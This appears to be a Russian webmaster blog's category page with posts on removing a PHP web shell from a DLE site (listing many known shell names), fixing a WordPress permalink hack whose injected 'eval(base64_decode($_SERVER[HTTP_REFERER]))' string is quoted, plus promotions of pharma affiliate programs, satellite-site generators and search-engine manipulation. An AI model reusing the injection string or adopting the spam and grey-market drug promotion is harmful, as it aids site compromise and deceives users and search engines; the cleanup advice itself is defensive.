Browse Category: Мои Эксперименты

Как найти шелл(shell) на DLE ?

Недавно заметил что на одном моем сайте на DLE  в шаблоне постоянно появляется левый зашифрованный код, который явно не я туда вставил. Первый раз счел это своей невнимательностью и издержками выбора «бесплатного» шаблона, в которых частенько попадаются такие сюрпризы.

Но спустя время аналогичный зашифрованный код появился в других частях шаблона и файлах движка и каждый раз все более и более изощренно запрятанный. Тут началась моя охота на хакера. Вариантов было много либо кто то угнал мои пароли от фтп, либо сломали хостера, либо используется очередная дыра в DLE,…

После смены всех паролей и обновления версии скрипта злополучный код продолжал появляться после удаления, вывод напрашивался сам собой, на сайт залит shell.

Шелл — shell — оболочка, среда выполнения команд.(виндовс — это тоже шел). В инете понимается под доступом к серверу в сети, на котором ты можешь выполнять команды (хакать, дампить,спамить). По сути маленький скрипт, через который можно удаленно делать все тоже что и администратор сервера. вот некоторые из них: Ajax_PHP, Antichat, AyyildizaZRaiLPhp, c99_locus7s, c99_madnet, c99_PSych0, c99_w4cking, Crystal, ctt_sh, cybershell, dC3, Dive < Shell >, DTool, GFS, gfs_sh, h4ntu, iMHaPFtp, ironshell, JspWebshell, KAdot, lamashell, Liz0ziM, load_< shell >, matamu, Moroccan, myshell, NCC-Shell, NetworkFileManagerPHP, NIX, nshell, nstview, PH Vayv, PHANTASMA, PHP < Shell >, php-backdoor, php-include-w-shell, pHpINJ, PHPJackal, PHPRemoteView, Private-i3lue, r57shell, rootshell, ru24_post_sh, s72 < Shell > v1.1 Coding, Safe0ver < Shell >, Safe_Mode Bypass, SimAttacker, simple-backdoor, simple_cmd, SimShell 1.0, SnIpEr_SA < Shell >, tryag, Uploader, WinX < Shell >, Worse Linux < Shell >, zacosmall

Сначала был вариант копаться в логах сервера, но из-за большой посещаемости логи оказались оч. большими чтобы в них что то найти. Вариант вручную искать левые файлы на сервере тоже не вызывал энтузиазма.

Решение нашлось само собой, оказывается в DLE есть так называемый «Антивирус» который сам анализирует файлы движка и выводит список файлов не входивших в дистрибутив установки движка. (туда обычно попадают моды, хаки для DLE, которые сам устанавливаешь). Среди этих подозрительных файлов и был залитый в папку «uploads» 3 php файлика того самого Шелла.
Дополнительные файлы были удалены, в индексном файле шелла удалил код и оставил надпись «Hello World».
Надеюсь что на этом противостояние с хакером окончилось.

Upd. Рекомендую также ознакомиться со статьей:

Уязвимости и взлом сайтов DLE

Rufarma.biz новое веяние в ру фарме

Уже по моему третья партнерка в Рунете которая занимается продажей фарма препаратов в России.

Контора молодая но уже зарекомендовавшая себя. На платниках имеется скан сертификата разрешающего фармакологическую деятельность в РФ (даже не знаю на сколько им можно верить) но у большинства юзеров вызывает доверие.

В первую неделю работы получилось почти 1.5 к рублей ))   Немного но для нового для меня направления думаю покатит.

Довольно неплохой конверт для рунета 5500 рублей за 1к юзеров (почти 200$ за 1к)

Для особо любопытных расскажу что траф с ВК.

Платник с попперсами. Кто не знает что такое попперсы? вот вам справка:

Попперс —  представляет собой разнообразные химические вещества, имеющие физиологический эффект. Имеет резкое сиюминутное действие, обострение всех чувств, голова становится легкой и ощущается пульс во всем теле. Как правило, используют попперсы на дискотеках и в сексе. Реализуются они обычно как ароматизаторы в магазинах для взрослых.

Ну и конечно же есть и виагра и левитра и сиалис

Регистрация

Как Быстро Создать Сеть Сателлитов?

Сегодня расскажу про сервис sayts.ru
Не раз уже в блогосфере проскакивало упоминание этого сайта, ну вот и у меня дошли руки его потрогать 🙂

Сервис облегчает и значительно ускоряет работу по поиску контента для сайта.

вот что они предлагают:

— Автоматическое восстановление сайтов с ВебАрхива.
— Автоматическое создание Форумов с уникальным контентом на движках  PHPBB и vBulletin.
— Автоматическое создание Варезников на движках DLE, WordPress и Drupal.
— Автоматическое создание Фотогалерей на движке Coppermine Photo Gallery. Перед добавлением на сайт, фотографии проходят несколько этапов уникализации и на выходе вы уже получаете фотогалерею с уникальными картинками, названиями и описаниями.
— Автоматическое создание Магазинов на движке Shop-Script FREE и VirtueMart.

Основные функции системы:

1. Быстрое и качественное создание сайтов.
2. Доступные цены. Сайт в 1000стр. обойдется в 5$. Форум с уникальным контентом — 15$. Восстановление сайтов с ВебАрхива — 15$ за 1000 файлов.
3. Понятный функционал системы.
4. Для создания сайта доступно большое количество различных рубрик и тематик.
5. Автоматическая заливка созданных сайтов на хостинг, или сервер.
6. Отзывчивый саппорт.
7. Партнерское вознаграждение 10%.

Все красиво, функционально, а главное радуют цены.  Все примеры сайтов с таким контентом в индексе , а это внушает здоровый оптимизм ). Не сказать что сервис моментально генерит сайты по одному клику. Работать все такие придется.  На выходе получается SQL дамп под нужный движок а также архив с картинками/аватарками, которые надо заливать на сервер.

Внутри все интуитивно понятно и просто, минимум настроек, максимум автоматизации.

За недолгую историю проекта (старт был 20 января) он уже набрал посещаемость под 2к/сутки. Представляете сколько уже вебмастеров обходит вас по количеству генерируемых сайтов/проектов?

Минусы конечно же тоже есть. Скорость генерации не на том уровне, что хотелось бы )  уже несколько часов ожидаю окончания выполнения своих проектов. Радует что можно в любой момент можно остановить и забрать то, что уже собрано с возвратом неизрасходованных средств.

Теперь Создать свою армию сайтов/сателлитов для добычи трафа и покорения TopSape легко.

Регистрация

Cкрытый или слабовидимый текст / если сайт выпал из индекса

Недавно для одного сайта (название его изменю на этот домен) пришло письмо от яндекса следующего содержания.

При этом Сайт полностью выпал из индекса Яндекса (до этого было 27 000 страниц)

Здравствуйте, Сергей!

Наши алгоритмы обнаружили на страницах сайта Zeddy.ru , права на который Вы подтвердили в сервисе Яндекс.Вебмастер, скрытый или слабовидимый текст, недоступный пользователям сайта, и предназначенный исключительно для робота поисковой системы. В связи с этим мы вынуждены частично исключить Ваш сайт из поисковой выдачи.

Примеры страниц, на которых обнаружен скрытый текст:

http://zeddy.ru/2010/02/17/mts-zapretil-abonentam-uxodit-v-minus/
http://zeddy.ru/2010/02/16/kak-sozdat-pribylnyj-blog/
http://zeddy.ru/2010/02/14/gde-iskat-novye-temy-dlya-zarabotka/

Пожалуйста, удалите скрытый текст со страниц сайта. Когда изменения будут внесены, сайт вернется в поиск автоматически.

Если у Вас возникли вопросы, вы можете задать их в службу поддержки Яндекса. Для этого воспользуйтесь этой формой.


С уважением,
Яндекс.Вебмастер

Если Ваш сайт выпал именно по этой причине, попробуйте Посмотреть внимательно на свой сайт. У меня проблема была в сквозном блоке с насыщенным ключевыми словами текстом. примерно следующего содержания:

О сайте:

На нашем сайте вы можете посмотреть Онлайн видео, бесплатно скачать программы для своего компьютера, найти ключи к антивирусам, скачать аудиокниги, бесплатно скачать фильмы Аватар, Шерлок Холмс,  …….

в общем понятно ))

Вогнал этот блок в <noindex> </noindex> и в тот же день, не дожидаясь апа, сайт вернулся в индекс полностью (все 27к страниц).

Вывод: Переоптимизация приводит к фильтру

Результат: Легко отскочил ))

Я На своих сайтах везде подобные блоки засунул в ноуиндекс )

Остап Кэш Дает Бабло

Сквозь мглу и мрак,
Сквозь зиму, непогоду…
Идет уверенной походкою Остап,
Неся свои сокровища народу!

Ведь мог рвануть на Рио-де-Жанейро,
И там текилу с телочками пить.
Но слово дал помочь «своим» познать.
100 способов отъема денег у народа.

Все способы законны и легки:
Используй слабости и глупости народа,
Чтоб %username% на бабки развести,
Дай то, на что он падок волей.

О странный бизнес, Бизнес на страстях!
Продать желанье и любовь быть может.
Мы делаем Великие дела,
Продав свой опиум великому народу.

Не надо больше мне гадать,
Кто трафик мой надежнее сконвертит.
Процентов целых 95.
Готов отдать хоть в запечатанном конверте.

Готов свое бабло отдать тому
(12 стульев и «Сокровища Остапа«)
5000 баксов на кону
Для лучшей дюжины для гордости «Остапа»

Он друг, товарищ , брат.
Он помнит даже рефоводов.
5 ценных приза он припас
Для этого особого народа.

Забыт не будет даже новичек,
Кто «тему» ищет, но найти не может,
Десяток смс и ты в рядах,
На «Табурет Златой» претендовать ты можешь.

Вы думамали зачем сейчас пишу?
Выискивая рифму между строчек.
«Перо Златое» я забрать хочу.
Я -Блоггер, Это хорошо и точка.

Пол миллиона с барского плеча
Вернее с плеч великого Остапа
Не этого ли надо нам, Друзья
Партнерка чтоб работала бесплатно.

Так будем помнить чтить и знать
Заветы комбинатора Остапа.
Желаю всем сайчас поймать
Свою большую реку трафа.

Нескладный был местами стих,
И мысли где-то сбились в кучу,
Но главное, чтоб стимул не утих,
Когда с Остапа все призы получим %)

PS Для тех кто в танке это был Остапкешевский креативчик, там до конца месяца рейт 95% и возможность выйгать до 5000$, общий призовой фонд более 500 000 рублей.

Подробности конкурса тут
Регистрация в партнерке тут
Несколько инвайтов для читателей:
F3905D57648D
753FF18C1B9E
A0CB1D4A13BC
B367842E9A71
5843BBB8F760

KinoVIP.com Статистика и первая продажа

Можете меня поздравить у меня первая продажа на второй день работы с партнеркой.

Все просто траф с адвордса.

объявление типа

Nazvanie filma movie

100% legal & safe

url сайта

Слив трафика на страницу фильма на основной домен. Вот и весь секрет )
Получается что траф стоит 400$ за 1к трафа. Почти что фарма ))

Сегодня вордпресс сломали (eval base64_decode _SERVER[HTTP_REFERER]) (wp hack)

Именно такая строчка:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или такая:

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Приклеилась сегодня к моим ссылкам на полную новость.Эта проблема надлюбалась у многих блоггеров в основном западных.

Выглядело это так:

http://zeddy.ru/2009/08/27/ryadovye-budni-seoshnika/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Вместо нормального:

http://zeddy.ru/2009/08/27/ryadovye-budni-seoshnika/

Гугля нашел уже 1700 сломанных блогов

Рассказываю как пофиксить , если у вас та же проблема

Идем в

Настройки->Постоянные ссылки (ЧПУ)

видим что кто то исправил вид чпу на вот такой:

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Исправляем назад, на это:

/%year%/%monthnum%/%day%/%postname%/

Да и не забываем удалить последнего зарегистрировавшегося пользователя с именем
MikeWink E-mail: [email protected]
Западные блоггеры говорят что это все он, у меня тоже такой был как раз последний зарегистрировавшийся, так что наверное не врут.

За одно незабываем обновляться

Начинается настоящее лето

Ухожу в длительный запой отпуск, с завтрашнего дня на отпускном расписании, уже сегодня уезжаю на летний Алтайский оупен эйр под названием «Сан вайбс» уже куплено два ящика шампанского ящик пива и три бутылки кокосового ликера ) праздник намечается быть отличным несмотря на неутешительные прогнозы погоды. Лето, Алтай, палатки, и клубная музыка казалось бы не несочитаемые вещи в  очередной раз соберут всех клаберов со всей сибири на Чамале рядом с Алтайскими горами.

Кстати по теме добычи бабла в интернете: есть подозрение что акция  liex по  наросту тИЦ всем желающим приводит к бану в яндексе сайтов размещающих статьи.  У меня уже четвертый сайт (не ГС)  ушел из идекса с момента начала этой акции. Повышенная активность ГСТ (говно статей) на сайтах возможно приводит к бану (не проверено, лично мое мнение), а как у вас?

Post Scriptum: (Как попасть бесплатно)

Все еще свободно

Спам DLE как избавиться часть 2

Часто работаю с DLE и часто сталкиваюсь со спамом . И хотя многие «темы» для сайтов дле уже умерли особо «умные» продолжают делать профиля и спамить в комментариях этого движка.  вот оxень простой и эффективный  Хак как этого избежать:

Просто запретим вставлять ссылки в комментарии, делается это так:

Открываем engine/modules/addcomments.php
Ищем:

if( strlen( $name ) > 50 ) {
$stop[] = $lang[‘news_err_1’];
$CN_HALT = TRUE;
}

После вставляем:

if (preg_match («/href|url|http|www|.ru|.com|.net|.info|.org/i», $_POST[‘comments’]) || preg_match («/href|url|http|www|.ru|.com|.net|.info|.org/i», $_POST[‘name’]))
{
$stop[] = «URL адреса сайтов, публиковать ЗАПРЕЩЕНО!»;
$CN_HALT = TRUE;
}

Этот способ найден на каком-то сайте…

Часть 1 борьба со спамом в DLE

Post Scriptum: (Как попасть бесплатно)
Сайт domania.ru покупка и продажа квартир в Москве без посредников. Не плати посредникам ищи недвижимость сам.